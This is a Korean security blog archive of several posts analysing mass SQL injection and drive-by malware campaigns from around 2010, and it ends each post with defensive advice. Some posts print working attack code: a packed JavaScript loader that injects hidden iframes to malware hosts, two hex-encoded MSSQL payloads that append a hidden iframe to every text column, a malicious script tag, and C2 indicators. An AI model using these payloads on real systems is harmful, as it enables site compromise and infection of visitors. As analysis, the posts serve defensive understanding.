워렌 버핏이라는 유명한 투자가가 살고 있는 동네가 바로 오마하(Omaha)라는 곳으로, 버렌 버핏을 오마하의 현인(Oracle of Omaha)라고 불리기도 합니다.

하지만, 최근 오마하의 공립학교에서 해킹으로 인해 개인정보가 누출되는 사고가 발생하여 간단히 정리해 봅니다.

정체불명의 해커가 오마하 공립학교의 현직 및 전직 교직원 약 4,300 명 이상의 사회보장번호(우리나라의 주민등록번호)와 개인정보가 누출되었을 것으로 알려지고 있습니다.

공격은 오마하 학교에서 운영하는 Retirement System 웹사이트에서 발생했으며 지난 12월 21일에 처음 알려졌습니다. 하지만, 얼마만큼의 정보가 누출되었는지 파악할 수 없는 상태라고 합니다.

해커는 개인의 사회보장번호뿐만 아니라 수혜자에 관한 정보까지 포함되어 있는 데이터베이스에 침투했지만, 다행이도 신용카드 정보는 보관하지 않아 누출되지 않았습니다.

더욱 어이없는 문제는 해당 사이트는 관리자만이 로그온하여 접근할 수 있는 웹사이트의 형태인데도 불구하고 SQL Injection 취약점을 이용하여 손쉽게 침투할 수 있었다는 것입니다.

현재 웹 공격의 경향은 로그온을 하지 않아도 충분히 공격할 수 있는 Mass SQL 인젝션 공격이 대세를 이루고 있습니다. 하지만, 특정한 사이트를 노리는 경우에는 로그온 절차가 있떠라도 SQL 인젝션과 같은 취약점이 있는지 다시 한번 검토하여 예방하는 방안이 최선임을 명심해야 할 것입니다.

출처: http://www.southwestiowanews.com/articles/2011/01/15/around_the_region/doc4d3087e8be773707787918.txt

감사합니다.




reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    아무런 이름을 밝히지 않고 해킹하는 한 단체에서는 최근 다음에 해킹할 웹사이트를 공개적으로 언급하면서 사람들의 관심을 사고 있습니다.

    이 웹사이트는 MPAA(Motion Picture Association of America)에서 운영하는 것으로 저작권에 관한 정보를 알리고 있습니다.

    <그림 1. 웹사이트가 조작된 화면>

    공격 방식에 대해서는 여러가지 의견이 제시되고 있지만, 이 중에서 가장 신뢰할 수 있는 방식이 바로  SQL Injection 취약점이며, 아래 사진을 참고하십시오.

    <그림 2. SQL Injection 취약점이 있는 링크>

    SQL Injection 취약점을 통해 서버 장악, 데이터베이스 변조 및 조작, 정보 누출 등이 발생할 가능성이 있습니다.

    국내에서도 수많은 사이트가 SQL Injection 취약점에 노출되어 있습니다. 특히, Mass SQL Injection 취약점을 통해 많은 컴퓨터 사용자들이 인터넷을 이용하다가 감염되는 사례가 증가하고 있으므로, 이 문제점을 해결하는데 많은 노력을 기울여야 합니다.

    감사합니다.

    출처: http://news.softpedia.com/news/SQL-Injection-Used-to-Deface-Copyprotected-Others-Might-Follow-161316.shtml

    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus
      최근 ARP Spoofing 공격을 당하고 있는 PC 사용자의 사례가 급속도로 증가하고 있으며, 이를 해결하기 위해서 꽤 많은 노력을 들이는 경우가 발견되고 있습니다. 필자는 이러한 행태가 어떻게 발생하는지 추적해 정리해 봤습니다. 결론이 어떻게 나올까요?


      원래 ARP Spoofing 공격은 2007년도부터 유행하기 시작하였으며, PC가 아닌 Windows 서버에 공격을 가하는 형태였습니다. 즉, 이 때에는 웹서버 자체를 해킹하지 않았지만, 결과적으로 악성코드가 웹서버로부터 유포되는 듯한 형태입니다. 이 공격에 대한 자세한 사항은 아래 링크를 참고하십시오.

      ARP Spoofing 기법 이용한 웹페이지 악성코드 삽입사례 - KrCERT/CC 2007년03월
      http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2007003.pdf&docNo=IN2007003&docKind=3


      하지만, 지난 8월 중순(13일경?)에 ARP Spoofing 공격코드를 포함하고 있는 Mass SQL Injection 공격이 발생되고 있으며, 현재까지도 도메인 및 숙주 서버를 변경해 가면서 꾸준히 공격을 지속하고 있습니다.

      아래 표는 '콴's 블로그 ~'에서 발췌한 자료로 2010/8/13 - 2010/9/27일까지 yahoo.js 파일을 추적한 내용이며 오른쪽에 추가된 숫자는 국내(*.kr) 도메인에 감염된 링크의 수입니다.

      2010/08/13 http://www.xxx816.com.cn/cache/yahoo.js (2,960개)
      2010/08/14 http://www.xxx.me/xxches/yahoo.js (6,740개)
      2010/08/27 http://www.xxjiayuan.com/ad/yahoo.js (6,250개)
      2010/09/04 위와 동일
      (중략)
      2010/09/27 http://www.xxtoo.com/images/img.js (82개)

      블로그에서 분석한 자료에 따르면 약 10여 차례나 위치를 바꿔가면서 공격을 진행한 것을 알 수 있으며 대략적으로 최소 5만 개 정도의 링크가 감염되었을 가능성이 있다고 볼 수 있습니다.(주: 시일이 지남에 따라 변조된 웹사이트에서 제거되거나 하는 다양한 변수가 있으므로 실제보다 더 많은 사례가 있을 것으로 예상할 수 있습니다)


      이제 현실적으로 중요한 부분을 살펴 보면, 이러한 일련의 악성코드를 진단하여 예방 또는 치료하기 위해 제시된 방안이 무엇인가 입니다. 바로 yahoo.js에 관련된 문제점(ARP Spoofing 공격을 하도록 감염된 상태)을 해결하기 위한 방법으로 제시된 것이 바로 백신(안티바이러스) 회사들의 전용 백신 그리고 발견된 악성 코드를 진단할 수 있는 데이터베이스의 업데이트로 한정되어 있다는 것입니다.

      하우리의 전용백신
      http://www.hauri.co.kr/customer/download/vaccine_view.html?uid=75

      안철수연구소 ASEC 블로그
      http://core.ahnlab.com/223

      만약 동일한 형태지만 숙주 서버를 변경하고 소스도 약간 변경하여 다시 업로드되어 있다면 백신회사는 다시 이를 찾아 새로 분석하여 업데이트하는 쫓고 쫓는 현상이 반복되고 있습니다.


      이제 여기서 중요한 사항을 한가지 빼먹은 것이 있습니다. 바로 감염이 어떻게 이뤄지는지에 대한 것입니다. 악성 코드 제작자의 단계는 생략을 하고, 어떻게 이 악성코드가 유포되는지에 대해 알아보면 우려를 금할 수가 없습니다.

      두번째 배포 단계가 바로 일반적인 웹사이트에 URL(악성코드를 다운로드하게 하는 악성 링크)을 주입하는 SQL Injection 공격으로 판단됩니다. 또한, 다수의 사이트에 대해 무차별적으로 진행이 되는 만큼 이는 Mass SQL Injection 공격으로 간주할 수도 있습니다.

      따라서, 전용 백신이나 안티바이러스의 시그내처 업데이트로는 이 문제점을 근본적으로 해결하기 어려우며, 문제가 발생한 웹사이트마다 취약점을 해결해야만 합니다. 즉, 웹사이트 담당자는 자사 웹사이트의 보안을 책임져야 하며, 좀 전의 경우와 같이 SQL Injection 공격이 발생하지 않도록 주의 및 책임을 다해야 합니다.

      감사합니다.


      참고자료:

      아래는  http://www.xxx816.com.cn/cache/yahoo.js 에서 추출해 낸 난독화되어 있는 JS 코드입니다.

      eval{function{p,a,c,k,e,d}{e=function{c}{return{c<a?'':e{parseInt{c/a}}}+{{c=c%a}>35?String.fromCharCode{c+29}:c.toString{36}}};if{!''.replace{/^/,String}}{while{c--}{d[e{c}]=k[c]||e{c}}k=[function{e}{return d[e]}];e=function{}{return'\\w+'};c=1};while{c--}{if{k[c]}{p=p.replace{new RegExp{'\\b'+e{c}+'\\b','g'},k[c]}}}return p}{'k{3.h.n{\'j\'}==-1}{l u="t${&*%{f#$&%f$s";l 4=v x{};4.y{4.z{}+i*i*r};3.h=\'j=p;q=/;4=\'+4.F{};3.m=3.m.I{/\\<{\\w|\\f}*\\>/,""};3.J{"<2 a=7://6.5.9.e/d/K.H c=0 b=0></2><2 a=7://6.5.9.e/d/A.g c=0 b=0></2>"};3.o{"<2 a=7:\\/\\/6.5.9.e\\/d\\/G.g c=0 b=0><\\/2>"};k{B.C.n{"D 8.0"}==-1}3.o{"<2 a=7:\\/\\/6.5.9.e\\/d\\/E.g c=0 b=0><\\/2>"}}',47,47,'||iframe|document|expires|800816|www|http||com|src|height|width|cache|cn|W|html|cookie|60|hello|if|var|title|indexOf|writeln|Yes|path|1000|jdlkfj2340923423423s|jasghadsfgkdfjasdf|ghw3iss|new||Date|setTime|getTime|news|navigator|userAgent|MSIE|hcp|toGMTString|count|htm|replace|write|ad'.split{'|'},0,{}}}
      (주: 오남용을 막기 위해 일부 태그 및 URL은 변경했음을 알립니다.)

      이는 base62로 디코딩하여 알아낸 원본 코드는 아래와 같습니다.

      if(document.cookie.indexOf('hello')==-1){var ghw3iss="jasghadsfgkdfjasdf$(&*%(W#$&%W$jdlkfj2340923423423s";var expires=new Date();expires.setTime(expires.getTime()+60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();document.title=document.title.replace(/\[(\w|\W)*\]/,"");document.write("[iframe src=http://xxx.xx0816.com.cn/cache/ad.htm width=0 height=0][/iframe][iframe src=http://xxx.xx0816.com.cn/cache/news.html width=0 height=0][/iframe]");document.writeln("[iframe src=http:\/\/xxx.xx0816.com.cn\/cache\/count.html width=0 height=0][\/iframe]");if(navigator.userAgent.indexOf("MSIE 8.0")==-1)document.writeln("[iframe src=http:\/\/xxx.xx0816.com.cn\/cache\/hcp.html width=0 height=0][\/iframe]")}
      (주: 오남용을 막기 위해 일부 태그 및 URL은 변경했음을 알립니다.)

      PS: 악성코드의 감염에 대한 2차적인 책임은 사용자에게 있을 것으로 보입니다. 보안 패치를 제대로 하지 않았거나, 완성도가 있는 백신을 사용하지 않거나, 불필요한 동작(!)을 한 경우가 대부분일 것입니다.

      끝.
      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus
        최근 전세계적으로 SQL 인젝션 공격이 대규모로 발생하여 약 50여만 개의 웹사이트가 감염되어 충격을 주고 있습니다. 이 중에는 국내 웹사이트도 포함되어 있으며 약 2만 여개로 파악되고 있습니다. 이에 대한 사항을 정리해 봤습니다.

        자동화된 SQL 인젝션 공격은 최초에 SANS에서 파악되어 알려졌으며 자세한 사항은 아래와 같습니다.


        공격 코드로 추정되는 로그는 다음과 같습니다.

        공격 코드 #1.
        declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320
        764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e61
        6d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e6964
        20614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e7854595
        0653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d2
        05461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657
        845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722
        834303030292c5b272b40432b275d29292b636153542830783343363936363732363136443635323037333732363333443232363837343
        73437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324
        53730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343
        34432323330323232303733373437393643363533443232363436393733373036433631373933413645364636453635323233453343324
        6363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c65
        5f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c6
        55f435552736f7220%20as%20varchar(4000));exec(@s);--

        공격 코드 #2.
        declare%20@s%20varchar(4000);set%20@s=cast(0x6465636c617245204054205661726368417228323535292c406320
        566172436861522832353529206465436c615265207441624c455f637552736f7220437552536f7220664f522073454c45435420412e4e616d452
        c622e4e616d652066726f4d207379734f626a6563547320612c735973634f6c754d6e73206220576865524520612e69643d422e496420416e4420
        612e78545970453d27552720414e642028622e58745950653d3939204f5220622e58747950653d3335204f5220622e78747950453d323331206f7
        220422e58747950453d31363729206f70454e207441426c455f437552734f72206665746348206e4578742046724f6d205441426c655f637572736
        f7220494e546f2040742c4043205748694c6528404066655463485f7374615475733d302920624547694e20455845632827557064615465205b27
        2b40742b275d20536574205b272b40632b275d3d727472494d28434f6e7665525428764172434841722834303030292c5b272b40432b275d2929
        2b63615374283078334336393636373236313644363532303733373236333344323236383734373437303341324632463645363536443646363
        8373536393643363436393639364532453732373532463734363437333246363736463245373036383730334637333639363433443331323232
        3037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323
        6343639373337303643363137393341364536463645363532323345334332463639363637323631364436353345204173205641726348615228
        31303629292729204645546348206e4578542046524f4d205441626c655f437572734f5220494e546f2040742c406320654e6420436c4f53652054
        61624c455f635552734f52206445416c6c6f43415445205461426c455f435552736f5220%20as%20varchar(4000));exec(@s);--




        이 코드를 해독한 결과 다음과 같은 문자열을 찾아 낼 수 있습니다.

        공격 코드 #1.
        dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe='U' and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc('UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))') FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor

        공격 코드 #2.
        declarE @T VarchAr(255),@c VarChaR(255) deClaRe tAbLE_cuRsor CuRSor fOR sELECT A.NamE,b.Name froM sysObjecTs a,sYscOluMns b WheRE a.id=B.Id AnD a.xTYpE='U' ANd (b.XtYPe=99 OR b.XtyPe=35 OR b.xtyPE=231 or B.XtyPE=167) opEN tABlE_CuRsOr fetcH nExt FrOm TABle_cursor INTo @t,@C WHiLe(@@feTcH_staTus=0) bEGiN EXEc('UpdaTe ['+@t+'] Set ['+@c+']=rtrIM(COnveRT(vArCHAr(4000),['+@C+']))+caSt(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E As VArcHaR(106))') FETcH nExT FROM TAble_CursOR INTo @t,@c eNd ClOSe TabLE_cURsOR dEAlloCATE TaBlE_CURsoR


        주: 차이점은 declare 단어의 대소문자입니다.


        두번째 CAST() 에 포함되어 있는 문자열을 해독하면 아래와 같습니다.( 두개가 동일함)

        공격 코드 #1 & #2.
        <iframe src="hxxp://nemohuildiin.ru/tds/go.php?sid=1"  width="0" height="0" style="display:none"></iframe>

        (주: http 대신에 hxxp로 변경)


        현재 검색 엔진을 통해 감염된 웹페이지를 찾아 보면 대략 50여만 페이지가 넘습니다.


        nemohuildiin.ru 도메인은 중국에서 관리한 것으로 알려져 있으며 이미 방탄서버(bulletproof host)로 알려져 있는 AS4134 에 속해 있습니다. 이 네트워크는 Zeus 본넷의 C&C(Command and Control) 서버가 운영 중인 것으로 알려져 있습니다.

        구글의 검색 조건을 보다 자세하게 적용한 결과, AS4134가 조종하는 도메인은 약 3,008개에 이르며, 감염된 웹사이트는 약 20,800 개에 이릅니다. 구글 측에 따르면 현재 12,000 여개의 사이트가 현재에도 운영 중에 있다고 합니다.

        이렇게 웹 보안에서 가장 문제가 되는 SQL 인젝션 취약점은 최근에는 봇넷을 확장하는데 널리 이용되는 수단이 되고 있으며, 이 이외에도 바이러스 감염, 악성코드 전파 등도 함께 이뤄집니다.

        마지막으로, SQL 인젝션 취약점은 WAF(웹 방화벽, Web Application Firewall)로는 막기 어렵다는 것을 다시 한번 상기시켜 줍니다. 즉, 패턴(Pattern 또는 Signature)을 인식하여 차단하는 방식은 글자 한글자만 바꿔도 새로운 패턴으로 인식하는 한계를 지니고 있습니다.

        따라서, 이 문제점을 해결하기 위해서는 웹 소스 상에서 모든 매개변수 및 변수에 대해 안전한 값을 주고받는지 확인하는 Santization 과정을 반드시 수행하도록 소스를 개발 및 수정해야 합니다.

        감사합니다.

        참고자료: http://www.thetechherald.com/article.php/201033/6024/TTH-Labs-New-SQL-Injection-attack-hits-thousands-of-sites
        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus
          시만텍, 소포스, 카스퍼스키와 같은 유명한 보안 기업에서는 일정한 기간 즉, 분기나 반기마다 보안 정책이나 뉴스, 트렌드에 대한 보고서를 정기적으로 발간합니다.

          최근 발간한 시만텍의 메시지랩스의 보고서에 따르면 악성 코드를 유포하는 사이트의 약 90%가 정상적인 웹사이트인 것으로 밝혀져 충격을 주고 있습니다.

          기존의 경향대로라면 해커들이 고유한 목적으로 사용하기 위해 도메인을 생성하고 이를 이용하여 악성코드를 다운로드하거나 공격하게 하는 일련의 행동을 보여왔습니다. 하지만, 이렇게 도메인은 생성하게 되는 경우에는 금방 탄로가 나게 되어 차단되는 단점이 있다고 볼 수 있습니다.

          하지만, 최근 월드컵 웹사이트의 해킹 건과 같이 정상적인 웹사이트에 악성코드를 유포하는 페이지나 스팸 메시지를 보여주는 페이지를 은밀하게 업로드하여 이용하는 행태가 더욱 증가하고 있습니다.

          이렇게 악성 코드를 유포하게끔 하기 위한 공격 방식은 XSS(Cross-site scripting), SQL 인젝션, FTP 정보 누출 등을 이용하는 것으로 알려지고 있습니다.

          이중 XSS와 SQL 인젝션은 웹 취약점의 가장 대표적인 사례로 손꼽이고 있으며, 아직까지도 제대로 해결되지 못하고 있습니다. 물론, 이 취약점들은 악성 코드를 대규모로 유포시키는 Mass SQL Injection 취약점을 포함하고 있습니다.

          FTP에 관련된 부분으로는 계정정보가 누출되거나, ACL을 제대로 관리하지 못하는 경우에 발생하는 것으로 예상됩니다.

          감사합니다.



          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus
            최근 SQL 인젝션 취약점을 이용하여 대규모로 공격이 이뤄지는 Mass SQL Injection 공격이 서너번 발생했습니다.

            외국의 유명한 보안 기업인 M86 Security Lab은 Pushdo 봇넷이 발송하는 스팸에서 Asprox 의 변형된 악성 코드가 발견되었다는 소식을 공개했습니다. 원래 Asprox 악성 코드는 스팸을 발송하는 용도였지만 이 번에는 IIS/ASP 플랫폼으로 구성된 웹사이트에 대규모로 감염되는 현상이 새롭게 나타났습니다.  이 번주에 들어 새롭게 출현한 Asprox의 변형된 악성 코드들은 스팸을 보낼 뿐만 아니라 SQL 인젝션 공격을 수행하는 것으로 확인되었습니다.

            현재 다음과 같이 3개의 사이트가 공격에 사용되고 있습니다.

            CL63AMGTART.RU
            HYPERVMSYS.RU
            ML63AMGSTART.RU

            이 도메인들은 Asprox 봇의 컨트롤 서버를 인식하는데 사용되고 있으며, 컨트롤 서버에서는 스팸 템플릿 및 메일 수신자에 대한 정보도 제공합니다.


            현재까지 입수된 공격 코드를 살펴 보면 아래 화면과 같이 SQL 인젝션 명령어를 포함하고 있는 것을 확인할 수 있습니다.

            한편, Asprox 봇넷에서는 IIS/ASP로 작성된 웹사이트를 찾기 위해 구글의 엔진을 이용하고 있는 것도 확인되었습니다.

            SQL 인젝션 공격에 이용되는 인코딩된 코드는 아래와 같습니다.

            위의 코드 중에 노랑색으로 표시된 부분을 디코딩하면 아래와 같은 SQL 구문이 나타납니다.

            위의 하면에서 빨간색 사각형으로 표시된 부분을 디코딩하면 아래와 같이 공격 코드를 유포하는 사이트를 알아 낼 수 있었습니다.

            이 코드를 이용하여 구글에서 검색해 보면 현재 감염되어 있는 웹사이트의 현황 및 숫자를 파악할 수 있습니다.

            위 화면에서 빨간색으로 표시된 것은 국내 사이트로 Aspox 봇넷의 공격으로 침해된 상태를 나타냅니다. 이 사이트를 방문해 보면 아래와 같이 공격된 코드가 아직도 남아 있는 것을 확인할 수 있습니다.
            <경고: 해당 사이트에는 아직 공격 코드가 남아 있는 상태이므로 방문하지 않는 것이 좋습니다>

            구글을 통해 검색해 본 결과, 현재 6천 여개의 URL이 감염되어 있으며, Asprox의 변형 코드가 출현할 때마다 침해 당하는 사이트가 증가할 것으로 예상됩니다.

            필자가 자주 언급하는 사항이지만, 최근에는 웹 보안의 가장 기본적이면서도 오래된 고질병인 SQL 인젝션과 XSS 공격이 다시 활개를 치고 있습니다. 아울러 하나의 공격 방식만을 고집하는 것이 아니라 스팸 + SQL 인젝션 공격과 같이 2가지 이상의 상이한 공격 벡터를 보이면서 이를 차단하는 방법에 대한 추가적인 연구가 필요할 것으로 생각됩니다.

            감사합니다.

            출처: http://www.m86security.com/labs/i/Another-round-of-Asprox-SQL-injection-attacks,trace.1366~.asp


            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus
              외국에 위치하고 있는 보안 기업인 ScanSafe는 자사의 블로그를 통해 대규모의 SQL 인젝션 공격이 발생했다는 사실을 밝혔습니다.

              블로그에 따르면 이번 주 초부터 발생한 공격으로 월스트리트 저널, 예루살렘 포스트 등을 포함한 약 7천여개의 웹사이트가 침해되었습니다.

              공격은 이미 널리 알려져 있는 SQL 인젝션 취약점을 이용한 것으로 취약점이 있는 서버의 데이터베이스에 아래의 스크립트를 삽입하는 방식으로 진행되었습니다

              script src=http://ww.robint.us/u.js

              이 스크립트는 악성 코드가 포함되어 있는 웹서버에서 PC로 악성 코드를 자동으로 다운로드하도록 하는 것으로 백신이나 보안 패치가 부족한 PC에서 특히 위험합니다.

              한편 이번에 발생한 공격은 윈도우 서버 플랫폼 즉, IIS/ASP.NET 기반으로 개발된 웹사이트를 주 공격대상으로 삼고 있었습니다.

              월스트리트 저널의 경우에는 adicio.com 이라는 제휴 회사의 침해로 인해 WSJ.com 홈페이지의 특정 페이지에 공격이 나타나는 현상이 발생했습니다.

              공격받은 대부분의 웹사이트에서 악성 스크립트는 이미 제거된 상태이지만, 아직까지도 수천개 이상의 사이트들에서는 해결이 되지 않은 상태입니다.

              SQL 인젝션 취약점은 소스 코드에서 입/출력되는 값이 적절한지 검증을 거치지 않아 발생하는 것입니다. 따라서, 소스 수준에서 문제점을 해결해야만 이와 같은 공격으로부터 자유로울 수 있습니다.

              물론, WAF(웹 애플리케이션 파이워월)와 같은 보안 장비(소프트웨어)를 사용할 수 있지만, 새로운 유형의 공격 형태가 나타날 경우에는 또다시 문제가 될 소지가 많습니다. 따라서, 근본적으로 해결을 해야 합니다.

              출처: http://blog.scansafe.com/

              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus
                지난 12월 초, 대규모 SQL 인젝션 공격이 진행되어 약 12만 5천대 이상의 웹서버가 감염되었다는 주장이 제기되었습니다.

                  대규모 SQL 인젝션 공격(Mass SQL Injection Attack)이란 "봇넷이나 전문 스캐너 프로그램을 이용하여 무차별적으로 웹사이트를 공격하여 취약한 사이트를 찾아 내어 데이터베이스 등의 데이터를 조작하는 일련의 공격 행위"를 말합니다.
                  국내에서는 지난 해 9월부터 10월까지 수십여만 개의 웹 사이트를 해킹당한 바가 있으며 올해에도 여러 번의 공격이 보고되었으나, 국내의 피해가 아주 심하지 않아(!) 언론에 알려지지 않았습니다.

                최근에 발생한 공격은 318x.com 사이트에서 악성 프로그램을 다운로드하는 iFrame 형태로, 구글 검색 결과 약 12만 5천 개 이상 감염되었습니다. iFrame의 공격은 다른 웹페이지로 리디렉트(Redirect)하게 되며 사용자는 이러한 사실을 알아내기 어렵습니다. 

                공격이 진행된 상황은 다음과 같습니다.

                1. 사용자가 조작된 웹 페이지에 방문할 때에 318x.com/a.htm을 방문하도록 iframe으로 만들어진 스크립트가 자동으로 실행됩니다. a.htm 파일에는 두 가지 기능이 숨겨져 있습니다.
                • aa1100.2288.org/htmlasp/dasp/alt.html 에서 두 번째 iframe 코드 로드
                • jt.tongji.linezing.com/1358779/tongji.js 스크립트 로드(추적 목적)


                2. aa1100.2288.org/htmlasp/dasp/alt.html에 포함된 iframe의 기능은 다음과 같습니다.

                • aa1100.2288.org/htmlasp/dasp/share.html로 유도하는 세번째 iFrame 코드 생성
                • js.tongji.inezing.com/1364067/tongji.js 스크립트 로드(위의 스크립트 코드와 다름)
                • img.tongji.linezing.com/1364067/tongji.gif 이미지가 www.linezing.com를 가리키도록 <noscript> 코드 실행

                3. share.html은 공격을 염두로 둔 마스터 파일로 동작합니다. 다수의 스크립트 파일이 포함되어 있으며 사용자의 브라우저, 플래시의 버전 등의 기준에 따라 여러 개의 iFrame 코드들이 구성되어 있습니다.


                문제는 아직까지 이 공격의 목표 또는 직접적인 피해가 나타나고 있지 않습니다. 보안 업계에 따르면 마지막 공격 시점에 사용된 악성 코드에 관련된 스크립트를 모니터링한 결과 일부 코드가 변경되거나 삭제되고, 새로운 스크립트가 추가되고 있다고 합니다. 대부분의 파일은 .jpg 확장자로 위장되어 있지만 스크립트의 경우에는 .js 확장자를 가집니다.

                전체적인 공격 형태가 알려지지는 않았지만, 아래와 같이 같이 PDF 취약점을 이용하는 것으로 다수로 나타났습니다.

                • Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
                • MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
                • Microsoft Office Web Components vulnerabilities described in MS09-043
                • Microsoft video ActiveX vulnerability described in MS09-032
                • Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002


                다음과 같이 PDF 취약점을 이용하는 것으로 나타났습니다.
                이러한 일련의 공격이 성공적으로 이후어진 후에는 Backdoor.win32.Buzus.croo라는 파일을 windowssp.7766.org 사이트에서 비밀리에 다운로드하여 설치합니다. 악성 코드가 설치디면 다음과 같이 루트킷의 형태로 동작하는 파일을 컴퓨터에 설치합니다. 

                • %UserProfile%\ammxv.drv
                • %ProgramFiles%\Common Files\Syesm.exe


                또한, 악성 코드는 컴퓨터에서 시작할 때마다 자동으로 실행되도록 하기 위해 아래와 같이 레지스트리를 변경합니다.

                    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller
                    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller\Security
                    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller
                    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller\Security

                Backdoor.Win32.Buzus.croo는 121.14.13.136.5:80에 연결을 시도하고 hxxp://dns.winsdown.com/cn/Countdown/count.asp 로 POST 요청을 전송합니다.

                악성 코드는 IRC를 이용하여 원격을 관리하는 형태이며 공격의 목표는 신용카드와 같은 금융 정보를 빼내는 것입니다.

                지난해 9월 이후로 발생하는 대규모 SQL 인젝션 공격은 이제 일반화된 형태로 나타나고 있습니다. 이를 차단하는 방법은 사용자의 입장에서는 보안 패치와 바이러스 백신과 같은 보안 제품을 사용하는 것이며, 웹 관리자의 입장에서는 SQL 인젝션 공격의 원인인 취약점을 해결하는 것입니다. 물론 웹 관리자가 해결한다면 사용자까지 공격이 올 수 없게 되므로 웹 관리자의 주의가 매우 필요합니다.

                reTweet
                Posted by 문스랩닷컴
                blog comments powered by Disqus
                  지난 8월 하순에는 전세계가 아닌 국지적인 대규모 SQL 인젝션(Mass SQL Injection) 공격이 발생했습니다. 하지만, 국내의 피해가 적은 관계로 국내의 미디어에서는 별로 알려지지 않았습니다. 그 이유는 영문으로 된 웹 사이트를 공격 대상으로 삼았기 때문입니다.

                  하지만, 이번 Mass SQL 인젝션 공격을 좀더 자세하게 분석해 보면, 앞으로 발생할 수 있는 공격의 형태나 대상 등을 미리 짐작할 수 있습니다. 이에 대해 언급하고자 합니다.

                  이번 공격을 통해 약 21만 개의 웹 페이지가 감염되었으며, 공격을 주도한 IP는 중국발로 확인되었습니다. 기존 공격 형태에서는 전세계에 걸쳐 다양한 IP 주소들로부터 공격이 진행되었으나 이번 경우는 중국으로 국한되었다는 점이 참신(!)합니다. 공격을 주도한 서버는 약 60대 정도로 파악되고 있으며 대표적인 사이트는 http://a0v.org/, http://js.tongji.linezing.com 등이 있습니다만, 현재에는 모두 조치(!)가 된 상태입니다.

                  공격 방식은 두 단계로 진행됩니다.

                  1. 공격 대상 서버의 웹 페이지를 감염시킵니다. - <iframe> 형태의 코드를 웹소스에 삽입합니다.
                  2. 인터넷 사용자가 감염된 웹 페이지를 방문하는 동안에 자신의 컴퓨터에 악성 코드를 다운로드합니다.

                  놀라울만한 사실은 지난 8월 27일까지 악성코드를 다운로드한 횟수가 125만 번에 이른다는 점입니다.

                  지난 번에 국내에서도 DDOS 공격으로 인해 많은 어려움을 겪은 바 기억하실 것입니다. 이러한 DDOS 공격의 주요한 구성원은 바로 악성코드를 다운로드한 컴퓨터(봇)들입니다.

                  보통 1,000 대의 봇을 하나의 봇넷으로 간주합니다(주: 숫자에는 이견이 있을 수 있음) 따라서 감염된 댓수로 나눠보면 약 1000 개 이상의 봇넷이 새롭게 구축되었다는 것을 짐작할 수 있습니다.

                  이렇게 SQL 인젝션의 취약점을 이용하여 대규모로 봇넷을 구축할 수 있다는 사실이 실험적으로, 아니 성공적으로 밝혀졌습니다.

                  앞으로 강력한 봇넷이 구축된다면,
                  • 스팸 메일 대량 발송
                  • DDOS 공격의 대중화
                  • 악성 코드의 대량 유포
                  • 개인 정보(비밀번호, 은행 정보 등등)의 누출
                  • 기타 알려지지 않은 새로운 형태의 공격
                  등등의 공격이 올해 후반기과 내년에 발생할 것으로 예상됩니다.

                  이러한 문제점을 대한 대비책은 그리 어렵진 않습니다. 먼저 웹 서버단에서 살펴 보면 SQL Injection 공격의 원인인 웹 소스 상의 매개변수의 검사(Sanitization)를 확실히 하고, 웹 애플리케이션 방화벽(WAF) 등을 도입하는 것입니다.

                  사용자 단에서 볼 때에는 윈도우의 최신 서비스 팩 및 보안 업데이트 적용과 충분한 성능을 제공하는 안티 바이러스 제품을 사용하는 것이라고 볼 수 있습니다.

                  감사합니다.

